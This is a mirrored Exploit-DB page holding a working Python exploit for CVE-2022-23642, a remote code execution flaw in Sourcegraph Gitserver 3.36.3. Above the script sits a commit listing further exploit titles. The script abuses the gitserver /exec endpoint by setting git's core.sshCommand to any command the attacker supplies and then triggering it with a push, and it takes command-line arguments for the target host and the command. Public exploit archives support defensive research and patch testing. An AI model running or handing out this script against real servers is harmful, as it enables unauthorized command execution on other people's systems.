bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/remote/50964.py
Offensive Security 29e275db94 DB: 2022-06-15 
16 changes to exploits/shellcodes

Real Player v.20.0.8.310 G2 Control - 'DoGoToURL()' Remote Code Execution (RCE)
Real Player 16.0.3.51 - 'external::Import()' Directory Traversal to Remote Code Execution (RCE)
HP LaserJet Professional M1210 MFP Series Receive Fax Service - Unquoted Service Path
Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated)
Virtua Software Cobranca 12S - SQLi
Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF)
Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated)
TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated)
Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)
Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS)
Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)
phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)
ChurchCRM 4.4.5 - SQLi
Old Age Home Management System 1.0 - SQLi Authentication Bypass
SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS)
SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS)
2022-06-15 05:01:57 +00:00

86 lines
No EOL
2.2 KiB
Python
Executable file
Raw Blame History

# Exploit Title: Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)
# Date: 2022-06-10
# Exploit Author: Altelus
# Vendor Homepage: https://about.sourcegraph.com/
# Version: 3.63.3
# Tested on: Linux
# CVE : CVE-2022-23642
# Docker Container: sourcegraph/server:3.36.3
# Sourcegraph prior to 3.37.0 has a remote code execution vulnerability on its gitserver service.
# This is due to lack of restriction on git config execution thus "core.sshCommand" can be passed
# on the HTTP arguments which can contain arbitrary bash commands. Note that this is only possible
# if gitserver is exposed to the attacker. This is tested on Sourcegraph 3.36.3
#
# Exploitation parameters:
# - Exposed Sourcegraph gitserver
# - Existing repo on sourcegraph
import json
import argparse
import requests
def exploit(host, existing_git, cmd):
# setting sshCommand
data = {
"Repo" : existing_git,
"Args" : [
"config",
"core.sshCommand",
cmd
]
}
res = requests.get(host+"/exec", json=data).text
if len(res) > 0:
print("[-] Didn't work: {}".format(res))
exit(0)
# setting fake origin
data = {
"Repo" : existing_git,
"Args" : [
"remote",
"add",
"origin",
"git@lolololz:foo/bar.git"
]
}
res = requests.get(host+"/exec", json=data).text
if len(res) > 0:
print("[-] Didn't work: {}".format(res))
exit(0)
# triggering command using push
data = {
"Repo" : existing_git,
"Args" : [
"push",
"origin",
"master"
]
}
res = requests.get(host+"/exec", json=data).text
print("[*] Finished executing exploit")
parser = argparse.ArgumentParser()
parser.add_argument('--gitserver-host', required=True, help="Target Sourcegraph Gitserver Host")
parser.add_argument('--existing-git', required=True, help="e.g. Link of existing repository in target Sourcegraph")
parser.add_argument('--cmd', required=True, help="Command to run")
args = parser.parse_args()
host = args.gitserver_host
existing_git = args.existing_git
cmd = args.cmd
exploit(host, existing_git, cmd)
Reference in a new issue View git blame Copy permalink